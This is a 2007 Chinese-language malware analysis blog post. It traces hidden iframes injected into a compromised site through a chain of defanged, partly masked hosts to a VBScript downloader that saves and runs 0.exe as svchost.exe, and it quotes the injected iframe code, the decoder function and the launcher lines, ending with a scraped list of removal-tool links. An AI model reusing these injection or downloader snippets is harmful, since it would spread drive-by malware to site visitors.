endurer 原创
2007-03-26 第1版
该网首页末被加入代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/b**d*.htm?001" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src=%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width=0 height=0></iframe>
---/
hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码:
/---
<iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码:
/---
<iframe src="hxxp://w**.q**b*b****d.com/0.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://w**.q**b*b****d.com/0.htm (瑞星网页监控报为:Trojan.DL.VBS.Agent.clo)包含VBScript脚本代码,功能是用自定义函数:
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
解密变量t的值并执行。
变量t解密后的值为VBScript脚本代码,功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe,并创建内容为
/---
Set Shell = Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/
的文件svchost.vbs,通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs,从而让%temp%/svchost.exe得已运行。
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 20:40:47
修改时间 : 2007-3-26 20:41:0
访问时间 : 2007-3-26 0:0:0
大小 : 69037 字节 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a
Scanned file: 0.rar - Infected
|
0.rar/0.exe - infected by Worm.Win32.Viking.jr
Statistics:
Known viruses: |
285996 |
Updated: |
26-03-2007 |
File size (Kb): |
64 |
Virus bodies: |
1 |
Files: |
1 |
Warnings: |
0 |
Archives: |
1 |
Suspicious: |
0 |
|
%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D即hxxp://j**.t**h*e***c.cn/w**w*k***l//1.htm
包含Javascript脚本代码,功能是用unescape解密并输出变量Words的值,Words解密后的值包含信息:<!-- vml'exploit! --> 和shellcode 代码……
分享到:
相关推荐
手动移除方法 ...1、删除如下注册表项: [HKLM\SYSTEM\CurrentControlSet\Services\netsvcs] 2、从系统注册表项中删除如下所示"%System%\<rnd>.dll": [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost...
Net-Worm.Win32.Kido 专杀
delphi Email-Worm.Win32.Canbis
病毒Net-Worm.Win32.Kido.ih 清除方法
也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络,利用微软Windows ...
微软网站上不去 说明中毒了,可以用此工具杀一下
Worm.WhBoy
engine-worm.c
著名的bat.worm.muma,保存为txt格式
Worm.Win32.Relop I-Worm.Lentin.a,b,c,d,e,f,g I-Worm.Tanatos Worm.Win32.Opasoft.a,b,c,d I-Worm.Klez.a,e,f,g,h Win32.Elkern.c 程序先扫描内存,然后再扫描指定的路径。 若发现内存或...
zoj 2499 The Happy Worm.md
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
Worm.Nimaya(熊猫烧香) 专杀工具最新版本:1.10
morris worm source code
sql编程开发的worm蠕虫经典代码sql programming code developed by the classic worm worm
卡巴斯基黑名单验证助手;帮助你了解当前KEY是否已经被列入黑名单
手机中毒后解决方法,我碰到中毒后,就是使用这个访求解决的。不知对你是否有帮助。
网络-计算机-安全相关
微软推出的有关冲击波(Worm.Msblast)病毒的安全补丁程序,适用于WindowsXP。
win32.lovegate/i,win32.supnot.ay/ax/ah,i-worm.supnot众多变种 win32.parite.a 病毒,运行时,病毒会附加在Explorer.exe文件上以便驻留内存。 病毒会感染本地及其它可以访问的网络驱动器上的*.EXE和*.SCR...